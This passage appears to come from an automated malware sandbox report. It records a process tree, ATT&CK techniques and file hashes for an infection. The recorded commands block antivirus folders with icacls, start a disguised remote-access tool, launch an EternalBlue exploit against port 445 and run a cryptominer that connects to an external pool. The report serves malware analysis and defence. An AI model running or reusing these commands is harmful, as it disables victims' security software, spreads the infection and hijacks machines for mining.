icacls C:\Programdata\MB3Install /deny System:(F)
3⤵
- Modifies file permissions
PID:2780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
2⤵
PID:2600

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
3⤵
- Modifies file permissions
PID:2684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
2⤵
PID:2536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
2⤵
PID:2484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
2⤵
PID:2748

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
2⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
2⤵
PID:2400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
2⤵
PID:2856

C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
2⤵
PID:2892

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
2⤵
PID:2928

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
2⤵
PID:2960

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
2⤵
PID:620

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
2⤵
PID:2060

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
3⤵
- Executes dropped EXE
- Modifies file permissions
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:2084

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
2⤵
PID:964

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
2⤵
PID:2388

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
2⤵
PID:2504

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:2492

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:2824

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:2748

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:1376

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:1580

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:2832

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
2⤵
PID:1244

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:2880

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:2968

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
2⤵
PID:976

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
2⤵
PID:1384

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:304

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:1524

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:2168

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:2336

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
2⤵
PID:2340

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
2⤵
PID:308

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:2124

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:2640

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:2492

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:2792

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
2⤵
PID:1132

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
2⤵
PID:2884

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:2900

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:3000

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:2708

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:2060

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
2⤵
PID:1408

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2636

C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
2⤵
- Executes dropped EXE
PID:2984

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:240

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
2⤵
- Executes dropped EXE
PID:1040

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1712

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1708

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
1⤵
PID:1592

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
1⤵
- Modifies file permissions
PID:2592

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
1⤵
- Modifies file permissions
PID:2640

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:2528

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
1⤵
- Modifies file permissions
PID:2804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1758666557556329672-1036548265-14467411031543994897153131036701296254-600115089"
1⤵
PID:1052

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-199844360036387466118646559121614603340-15906194519507864071043848539-1371380985"
1⤵
PID:2172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "670329785-2019061470-1106429001487175618-1190168346-445920764-1177719328351138856"
1⤵
PID:2592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16082862481364923998-1433344908261914414-116276970213288209211460949948-435797928"
1⤵
PID:2780

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5069468031201763414-1703648805-2065152271397688821379897785-18022777241408295779"
1⤵
PID:2804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-913617197-759551807207905180810829089512321510541730510176-1199754324-1647249150"
1⤵
PID:2952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "366489829-10867926911310215146-150040371399871324450907240-14345801431543453711"
1⤵
PID:2060

C:\Windows\system32\taskeng.exe
taskeng.exe {AEDBA6DC-1F32-4FB8-BD76-70A3040F7CC2} S-1-5-21-293278959-2699126792-324916226-1000:TUICJFPF\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:2348

C:\Programdata\RealtekHD\taskhost.exe
C:\Programdata\RealtekHD\taskhost.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1028

C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
3⤵
- Executes dropped EXE
PID:2260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
4⤵
PID:2216

C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
5⤵
PID:2412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
3⤵
PID:2408

C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
4⤵
- Gathers network information
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
3⤵
PID:2748

C:\Windows\system32\gpupdate.exe
gpupdate /force
4⤵
PID:2728

C:\Programdata\WindowsTask\scaner.exe
C:\Programdata\WindowsTask\scaner.exe -pnaxui
3⤵
- Executes dropped EXE
PID:2868

C:\Programdata\WindowsTask\scandll.exe
C:\Programdata\WindowsTask\scandll.exe -pnaxui
3⤵
- Executes dropped EXE
PID:2196

C:\ProgramData\RunDLL\start.exe
C:\ProgramData\RunDLL\start.exe
3⤵
- Executes dropped EXE
PID:2060

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Programdata\RunDLL\start.vbs"
4⤵
PID:1360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rundll.exe
5⤵
- Loads dropped DLL
PID:2004

C:\Programdata\RunDLL\rundll.exe
Rundll.exe
6⤵
- Executes dropped EXE
PID:2764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "system.exe TCP 192.168.1.1 445 150 /save"
7⤵
- Loads dropped DLL
PID:2264

C:\Programdata\RunDLL\system.exe
system.exe TCP 192.168.1.1 445 150 /save
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "system.exe TCP 10.7.0.36/16 445 150 /save"
7⤵
PID:2516

C:\Programdata\RunDLL\system.exe
system.exe TCP 10.7.0.36/16 445 150 /save
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "Eternalblue-2.2.0.exe --inconfig Eternalblue-2.2.0.xml --NetworkTimeout 60 --TargetIp Scan --TargetPort 445 --Target WIN72K8R2"
7⤵
- Loads dropped DLL
PID:2424

C:\Programdata\RunDLL\Eternalblue-2.2.0.exe
Eternalblue-2.2.0.exe --inconfig Eternalblue-2.2.0.xml --NetworkTimeout 60 --TargetIp Scan --TargetPort 445 --Target WIN72K8R2
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2504

C:\ProgramData\WindowsTask\MicrosoftHost.exe
C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://45.153.231.121:3333 -u CPU --donate-level=1 -k -t1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Bypass User Account Control

T1088

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\System\iediagcmd.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe
MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe
MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe
MD5
a70edb47d3e316ce552ae09766ecb952

SHA1
eceff6722453fbed6190accaa9ecc3a74bdc7356

SHA256
a1fedc5b5caaccde52420d8950b4ca3b17111da49abf07ca0fb33123521e8641

SHA512
e16330a7e721329cce06f3b4546cd8ef9ca6307ecb747044f67811b9b4dc7ff59651e5eebc9025eb773c3061102e80b4bbed114db97adeb4c1b345ba05c8c4a5

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe
MD5
a70edb47d3e316ce552ae09766ecb952

SHA1
eceff6722453fbed6190accaa9ecc3a74bdc7356

SHA256
a1fedc5b5caaccde52420d8950b4ca3b17111da49abf07ca0fb33123521e8641

SHA512
e16330a7e721329cce06f3b4546cd8ef9ca6307ecb747044f67811b9b4dc7ff59651e5eebc9025eb773c3061102e80b4bbed114db97adeb4c1b345ba05c8c4a5

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe
MD5
87b45cfb9f62dd793f0ac86b8b7940e5

SHA1
6245b453590748a48c4e6c29f391c2189ff657a2

SHA256
df3cd1545ce80e880c687a4ae4dc0846c41aaa32115029c88b6297580a89ab17

SHA512
332f4c66b5a4324aeccf3ee337ee34b2e764704e528b29657c4b6628565a5898c35b2c49cd2881090ac0b770537e6fe0a4516cb072b63fccca1c2a0fc948d196

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe
MD5
87b45cfb9f62dd793f0ac86b8b7940e5

SHA1
6245b453590748a48c4e6c29f391c2189ff657a2

SHA256
df3cd1545ce80e880c687a4ae4dc0846c41aaa32115029c88b6297580a89ab17

SHA512
332f4c66b5a4324aeccf3ee337ee34b2e764704e528b29657c4b6628565a5898c35b2c49cd2881090ac0b770537e6fe0a4516cb072b63fccca1c2a0fc948d196

Download Submit
C:\ProgramData\RealtekHD\taskhost.exe
MD5
cd9f1b76be96fd43770b72805dd42c5c

SHA1
c52ee36a84df91abaf42266046038c5cb24bafe8

SHA256
5a6654ea85c37c375dbba3263f3b48f04143bdce67f91ab6604d172772c28f8e

SHA512
f9482ef145d5a1e9711e053cfee1f60bac99f7de134bd6539cb2d2a5221c7da650e248e9efc1dd8874fb8b5134b7e462261848a715907418865667eec7e12cbc

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe
MD5
e94f61a2467a198c6cc66a1f1e9cfb6e

SHA1
767628fe9032e6295f3cf9085081e49e2334818d

SHA256
0e47618cc1e6f4fe03b35aedf8bdaa8df7a6425a82aa075ec7c850fbdb8f6db2

SHA512
8e5e812c3246fb682a3dc087daf437514bfbe96769e8b07aa7c5d70e1728cee3114746392e12b0b84aa5cc9c25edfaaff8377b151593cbd3267a9fc943154af3

Download Submit
C:\ProgramData\Windows\install.vbs
MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg
MD5
0bfedf7b7c27597ca9d98914f44ccffe

SHA1
e4243e470e96ac4f1e22bf6dcf556605c88faaa9

SHA256
7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e

SHA512
d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

Download Submit
C:\ProgramData\Windows\reg2.reg
MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
